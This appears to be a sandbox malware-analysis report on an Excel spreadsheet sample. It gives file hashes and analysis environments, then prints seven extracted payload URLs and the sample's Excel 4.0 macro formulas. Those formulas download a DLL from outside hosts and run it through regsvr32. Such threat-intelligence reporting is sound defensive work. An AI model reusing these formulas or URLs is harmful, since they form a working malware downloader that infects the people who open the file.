General
-
Target
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
-
Size
29KB
-
Sample
240909-1wcweasdmq
-
MD5
c21157422bc9b05232891a332c35a2fd
-
SHA1
791f2d9c8178c44de752136047bd9a33b040daad
-
SHA256
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
-
SHA512
72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62
-
SSDEEP
384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs
Static task
static1
Behavioral task
behavioral1
Sample
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a.xlsx
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://www.casache.com/web/gTj3TrZ/
https://www.aulavirtualapecc.com/server/oib/
http://30aweddingco.com/cgi-bin/QUx/
http://blacksmithbooks.com/blog/OkmsfYUA/
http://consultores-sic.com/fw/AOOfOtj1qqgLWR/
http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/
https://damjangro.org/data/XPMJ/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.casache.com/web/gTj3TrZ/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/oib/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://30aweddingco.com/cgi-bin/QUx/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blacksmithbooks.com/blog/OkmsfYUA/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://consultores-sic.com/fw/AOOfOtj1qqgLWR/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.tugarden.com/docs/csv_import/xGmX9fs73iJl/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/XPMJ/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Targets
-
-
Target
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
-
Size
29KB
-
MD5
c21157422bc9b05232891a332c35a2fd
-
SHA1
791f2d9c8178c44de752136047bd9a33b040daad
-
SHA256
56ea587c1ab8efb5cc25c7491195f2efd6f1c1a533e1603605ddfa44051dd23a
-
SHA512
72e60f84edb0dcdec5b147723583d749c9c011a2a745c1614eb538189bbc8a0e4beb3953c8b9eabab24feba2b6c985136128c541ad824899e9adb61ecdf0db62
-
SSDEEP
384:EC7TmBkUnAKBmnAcLK5J9AVs6TeEB/g4Bmq3FrEBTqxGFzHHnjCMf4VdnIEk8DY:EC7TUnAKmD4ys2ewg4F32BlHHOx1vjs
Score3/10 -